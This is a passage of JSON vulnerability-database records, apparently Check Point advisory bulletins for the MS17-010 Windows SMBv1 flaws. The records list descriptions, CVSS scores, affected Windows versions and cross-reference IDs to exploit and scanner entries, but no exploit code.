"bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0148)", "description": "An information disclosure vulnerability exists in the SMBv1 component of Microsoft Windows SMB server. The vulnerability is due to improper handling of SMBv1 requests. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted SMBv1 messages to a target server. Successful exploitation could result in the disclosure of sensitive information from the target server.", "published": "2017-05-16T00:00:00", "modified": "2017-05-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-02T03:31:00", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:31:00", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-11-02T03:31:00", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0177", "vendorId": null, "hash": "e24bc6cf789f730909a90d9d3667eecf", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0143)", "description": "A remote code execution vulnerability exist in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way SMBv1 service handles certain requests. An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-11-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-01T23:25:45", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-11-01T23:25:45", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2021-11-01T23:25:45", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.checkpoint.CheckpointAdvisoryBulletin"]}, {"id": "CPAI-2017-0200", "vendorId": null, "hash": "ad76ea3a96eda4cabf6f3ae9c8382ad2", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0145)", "description": "A remote code execution vulnerability exist in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way SMBv1 service handles certain requests. An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-04-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-02T03:31:25", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:31:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-02T03:31:25", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0198", "vendorId": null, "hash": "704970fa03766cce3d06ec52134b4ee2", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0144)", "description": "A remote code execution vulnerability exist in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way SMBv1 service handles certain requests. An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-07-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-02T03:30:23", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0144"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:57B0F10A16E18DC672833B1812005B76"]}, {"type": "thn", "idList": ["THN:E18080D17705880B2E7B69B8AB125EA9", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:30:23", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-02T03:30:23", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["Windows Vista", "Windows Server 2008", "Windows 7", "Windows Server 2008 R2", "Windows 8.1", "Windows Server 2012", "Windows Server 2012 R2", "Windows RT 8.1", "Windows 10", "Windows Server 2016"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.checkpoint.CheckpointAdvisoryBulletin", "robots.models.base.Bulletin"]}, {"id": "CPAI-2017-0205", "vendorId": null, "hash": "2202ed3bdd16a2bb4c960200b3dc7ec8", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "Microsoft Windows SMB Information Disclosure (MS17-010: CVE-2017-0147)", "description": "An information disclosure vulnerability exists in the SMBv1 component of Microsoft Windows SMB server. The vulnerability is due to improper handling of SMBv1 requests. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted SMBv1 messages to a target server. Successful exploitation could result in the disclosure of sensitive information from the target server.", "published": "2017-03-14T00:00:00", "modified": "2017-06-15T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-02T03:30:30", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96709"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-02T03:30:30", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2021-11-02T03:30:30", "rev": 2}}, "objectVersion": "1.6", "severity": "Medium", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], 